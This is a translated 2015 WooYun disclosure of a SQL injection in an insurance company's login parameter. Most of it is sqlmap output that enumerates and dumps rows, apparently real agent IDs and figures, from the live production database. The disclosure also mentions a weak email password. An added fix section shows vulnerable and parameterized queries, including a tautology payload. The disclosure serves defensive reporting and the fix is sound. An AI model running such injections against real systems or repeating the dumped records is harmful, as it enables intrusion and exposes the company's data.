Vulnerability summary (followers: 24)
Defect ID: wooyun-2015-0131660
Title: Fanhua Insurance (泛华保险) core system: DBA-privilege SQL injection (25 databases) / weak password
Vendor: pywm.com.cn
Author: 路人甲
Submitted: 2015-08-04 20:17
Fixed: 2015-09-20 12:00
Published: 2015-09-20 12:00
Type: SQL injection
Severity: High
Self-assessed rank: 20
Status: Confirmed by vendor
Source: http://www.wooyun.org; for questions or assistance contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-08-04: Details sent to the vendor; awaiting vendor handling
2015-08-06: Vendor confirmed; details visible to the vendor only
2015-08-16: Details opened to core white hats and relevant domain experts
2015-08-26: Details opened to regular white hats
2015-09-05: Details opened to intern white hats
2015-09-20: Details opened to the public
Brief description:
Injection. You know the drill!
Detailed description:
Captured the login request
The usercode parameter is injectable
sqlmap
Current privileges
Current database
Proof only; I did not go further
=============================================================
Bonus: a weak email password as well
Proof of vulnerability:
A few rows dumped at random as proof
[19:53:45] [INFO] fetching tables for database: 'CBSOPR'
[19:53:45] [INFO] the SQL query used returns 18 entries
[19:53:45] [INFO] resumed: T_LSBLYY_20130509
[19:53:45] [INFO] resumed: CHENTEMPTABLE
[19:53:45] [INFO] resumed: CHENTEMPTABLE2
[19:53:45] [INFO] resumed: AGENTTEMPTABLE
[19:53:45] [INFO] resumed: TEMPTYPE
[19:53:45] [INFO] resumed: CCH02
[19:53:45] [INFO] resumed: T_LSBLYY_20121020
[19:53:45] [INFO] resumed: CHENFZCARD
[19:53:45] [INFO] resumed: ERROR_LSB_U_CONTNO
[19:53:45] [INFO] resumed: CCHENTEMPTABLEZN
[19:53:45] [INFO] resumed: FAAGENTTEMP
[19:53:45] [INFO] resumed: FAAGENTTEMP2
[19:53:45] [INFO] resumed: CCH01
[19:53:45] [INFO] resumed: FAAGENTTEMP1
[19:53:45] [INFO] resumed: TEMPQRY
[19:53:45] [INFO] resumed: TESTQRY1
[19:53:45] [INFO] resumed: TESTQRY2
[19:53:45] [INFO] resumed: CCH03
[19:53:45] [INFO] fetching columns for table 'CCH03' in database 'CBSOPR'
[19:53:45] [INFO] the SQL query used returns 5 entries
[19:53:45] [INFO] resumed: COL1
[19:53:45] [INFO] resumed: VARCHAR2
[19:53:45] [INFO] resumed: COL2
[19:53:45] [INFO] resumed: NUMBER
[19:53:45] [INFO] resumed: COL3
[19:53:45] [INFO] resumed: NUMBER
[19:53:45] [INFO] resumed: COL4
[19:53:45] [INFO] resumed: NUMBER
[19:53:45] [INFO] resumed: COL5
[19:53:45] [INFO] resumed: NUMBER
[19:53:45] [INFO] fetching entries for table 'CCH03' in database 'CBSOPR'
[19:53:46] [INFO] the SQL query used returns 15 entries
[19:53:51] [INFO] retrieved: 26101028033001130000128
[19:53:51] [INFO] retrieved: 0
[19:53:51] [INFO] retrieved: 0
[19:53:52] [INFO] retrieved: .05
[19:53:52] [INFO] retrieved: 216.85
[19:53:52] [INFO] retrieved: 26101028033001130000127
[19:53:53] [INFO] retrieved: 0
[19:53:53] [INFO] retrieved: 0
[19:53:53] [INFO] retrieved: .05
[19:53:54] [INFO] retrieved: 186.99
[19:53:54] [INFO] retrieved: 26101028033001130000126
[19:53:54] [INFO] retrieved: 0
[19:53:55] [INFO] retrieved: 0
[19:53:55] [INFO] retrieved: .05
[19:53:55] [INFO] retrieved: 269.18
[19:53:56] [INFO] retrieved: 26101028033001130000125
[19:53:56] [INFO] retrieved: 0
[19:53:56] [INFO] retrieved: 0
[19:53:57] [INFO] retrieved: .05
[19:53:57] [INFO] retrieved: 127.21
[19:53:57] [INFO] retrieved: 26101028033001130000122
[19:53:58] [INFO] retrieved: 0
[19:53:58] [INFO] retrieved: 0
[19:53:58] [INFO] retrieved: .05
[19:53:58] [INFO] retrieved: 125.67
[19:53:59] [WARNING] user aborted during enumeration. sqlmap will display partial output
[19:53:59] [INFO] analyzing table dump for possible password hashes
Database: CBSOPR
Table: CCH03
[5 entries]
+------+--------+------+------+-------------------------+
| COL4 | COL5 | COL2 | COL3 | COL1 |
+------+--------+------+------+-------------------------+
| .05 | 216.85 | 0 | 0 | 26101028033001130000128 |
| .05 | 186.99 | 0 | 0 | 26101028033001130000127 |
| .05 | 269.18 | 0 | 0 | 26101028033001130000126 |
| .05 | 127.21 | 0 | 0 | 26101028033001130000125 |
| .05 | 125.67 | 0 | 0 | 26101028033001130000122 |
+------+--------+------+------+-------------------------+
[19:53:59] [INFO] table 'CBSOPR.CCH03' dumped to CSV file 'C:\Users\Administrat0r\.sqlmap\output\cbs.cninsure.net\dump\CBSOPR\CCH03.csv'
[19:53:59] [INFO] fetching columns for table 'AGENTTEMPTABLE' in database 'CBSOPR'
[19:53:59] [INFO] the SQL query used returns 3 entries
[19:54:00] [INFO] retrieved: COL1
[19:54:00] [INFO] retrieved: VARCHAR2
[19:54:00] [INFO] retrieved: COL2
[19:54:01] [INFO] retrieved: VARCHAR2
[19:54:01] [INFO] retrieved: COL3
[19:54:02] [INFO] retrieved: VARCHAR2
[19:54:02] [INFO] fetching entries for table 'AGENTTEMPTABLE' in database 'CBSOPR'
[19:54:02] [INFO] the SQL query used returns 57 entries
[19:54:03] [INFO] retrieved: 620363803
[19:54:04] [INFO] retrieved: T620363803
[19:54:07] [INFO] retrieved: 620364115
[19:54:07] [INFO] retrieved: T620364115
[19:54:08] [INFO] retrieved: 620363829
[19:54:08] [INFO] retrieved: T620363829
[19:54:08] [INFO] retrieved: 620363916
[19:54:09] [INFO] retrieved: T620363916
[19:54:09] [INFO] retrieved: 620363836
[19:54:09] [INFO] retrieved: T620363836
[19:54:10] [INFO] retrieved: 620363846
[19:54:10] [INFO] retrieved: T620363846
[19:54:10] [INFO] retrieved: 620363850
[19:54:11] [INFO] retrieved: T620363850
[19:54:11] [INFO] retrieved: 620363918
[19:54:12] [INFO] retrieved: T620363918
[19:54:12] [INFO] retrieved: 620363853
[19:54:12] [INFO] retrieved: T620363853
[19:54:13] [INFO] retrieved: 620363861
[19:54:13] [INFO] retrieved: T620363861
[19:54:13] [INFO] retrieved: 620363872
[19:54:14] [INFO] retrieved: T620363872
[19:54:14] [INFO] retrieved: 620363876
[19:54:14] [INFO] retrieved: T620363876
[19:54:15] [INFO] retrieved: 620363888
[19:54:15] [INFO] retrieved: T620363888
[19:54:15] [INFO] retrieved: 620363900
[19:54:16] [INFO] retrieved: T620363900
[19:54:16] [INFO] retrieved: 620363911
[19:54:17] [WARNING] user aborted during enumeration. sqlmap will display partial output
[19:54:17] [INFO] analyzing table dump for possible password hashes
Database: CBSOPR
Table: AGENTTEMPTABLE
[14 entries]
+------------+------+-----------+
| COL2 | COL3 | COL1 |
+------------+------+-----------+
| T620363803 | NULL | 620363803 |
| T620364115 | NULL | 620364115 |
| T620363829 | NULL | 620363829 |
| T620363916 | NULL | 620363916 |
| T620363836 | NULL | 620363836 |
| T620363846 | NULL | 620363846 |
| T620363850 | NULL | 620363850 |
| T620363918 | NULL | 620363918 |
| T620363853 | NULL | 620363853 |
| T620363861 | NULL | 620363861 |
| T620363872 | NULL | 620363872 |
| T620363876 | NULL | 620363876 |
| T620363888 | NULL | 620363888 |
| T620363900 | NULL | 620363900 |
+------------+------+-----------+
[19:54:17] [INFO] table 'CBSOPR.AGENTTEMPTABLE' dumped to CSV file 'C:\Users\Administrat0r\.sqlmap\output\cbs.cninsure.net\dump\CBSOPR\AGENTTEMPTABLE.csv'
[19:54:17] [INFO] fetching columns for table 'CCH01' in database 'CBSOPR'
[19:54:17] [INFO] the SQL query used returns 10 entries
[19:54:17] [INFO] retrieved: COL1
[19:54:18] [INFO] retrieved: VARCHAR2
[19:54:18] [INFO] retrieved: COL2
[19:54:18] [INFO] retrieved: VARCHAR2
[19:54:19] [INFO] retrieved: COL3
[19:54:19] [INFO] retrieved: NUMBER
[19:54:20] [INFO] retrieved: COL4
[19:54:20] [INFO] retrieved: NUMBER
[19:54:20] [INFO] retrieved: COL5
[19:54:21] [INFO] retrieved: NUMBER
[19:54:21] [INFO] retrieved: COL6
[19:54:21] [INFO] retrieved: NUMBER
[19:54:22] [INFO] retrieved: COL7
[19:54:22] [INFO] retrieved: NUMBER
[19:54:22] [INFO] retrieved: COL8
[19:54:23] [INFO] retrieved: NUMBER
[19:54:23] [INFO] retrieved: COL9
[19:54:23] [INFO] retrieved: NUMBER
[19:54:24] [INFO] retrieved: COL10
[19:54:24] [INFO] retrieved: VARCHAR2
[19:54:24] [INFO] fetching entries for table 'CCH01' in database 'CBSOPR'
[19:54:25] [INFO] the SQL query used returns 444 entries
[19:54:28] [WARNING] user aborted during enumeration. sqlmap will display partial output
[19:54:28] [INFO] fetching number of entries for table 'CCH01' in database 'CBSOPR'
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 0
[19:54:28] [INFO] resumed: 0
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] resumed: 444
[19:54:28] [INFO] retrieved:
Fix recommendation:
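The report leaves the fix section empty. As an added illustration that is not part of the original report or the vendor's code, the following shows the pattern behind the finding, a login lookup that splices the usercode parameter into the SQL text, beside the parameterized form that closes it. It uses SQLite from Python's standard library so it runs self-contained; the real backend is Oracle (the VARCHAR2/NUMBER types in the dump), where the same fix is a bind variable. The table name, column names and sample rows are constructed for the demo.

```python
import sqlite3

# Constructed sample data standing in for the real login table.
# Table and column names are assumptions for this demo, not from the report.
SAMPLE_USERS = [("agent001", "pw-hash-1"), ("agent002", "pw-hash-2")]


def make_db():
    """Build an in-memory database with the constructed login table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_user (usercode TEXT PRIMARY KEY, pwd_hash TEXT)")
    conn.executemany("INSERT INTO t_user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, usercode):
    # The defect class behind the finding: the request parameter is pasted into
    # the statement text, so any quote or keyword in it is parsed as SQL.
    sql = "SELECT usercode FROM t_user WHERE usercode = '" + usercode + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, usercode):
    # Hardened form: a bound parameter. The driver ships the value separately
    # from the statement, so its contents can only ever be compared as data.
    sql = "SELECT usercode FROM t_user WHERE usercode = ?"
    return [row[0] for row in conn.execute(sql, (usercode,))]


def compare(usercode):
    """Run both forms on the same input; return (vulnerable_result, safe_result).

    A syntax error from the vulnerable form is reported as a string, since a
    database error surfacing on a quote in the input is itself the classic
    tell that the parameter is being interpolated into SQL.
    """
    conn = make_db()
    try:
        vuln = lookup_vulnerable(conn, usercode)
    except sqlite3.Error as exc:
        vuln = f"SQL error: {exc}"
    safe = lookup_parameterized(conn, usercode)
    conn.close()
    return vuln, safe


if __name__ == "__main__":
    # Normal input behaves identically in both forms.
    print(compare("agent001"))
    # A stray quote breaks the concatenated statement; the bound form just finds no match.
    print(compare("agent001'"))
    # A tautology in the value rewrites the concatenated WHERE clause and returns
    # every row; the bound form still compares it literally and finds nothing.
    print(compare("x' OR '1'='1"))
```

Two further points follow from the report itself: sqlmap ran as a DBA and could read 25 databases, so beyond binding parameters the application's database account should hold only the privileges the login flow needs (read on its own schema, no DBA role), which bounds the damage of any future injection; and the "SQL error on a quote" behaviour shown above is exactly what application-side error logging and a WAF rule on login parameters should be alerting on.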
Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting
Vulnerability response
Vendor response:
Severity: High
Vulnerability rank: 15
Confirmed at: 2015-08-06 11:59
Vendor reply:
Thanks
Latest status:
None yet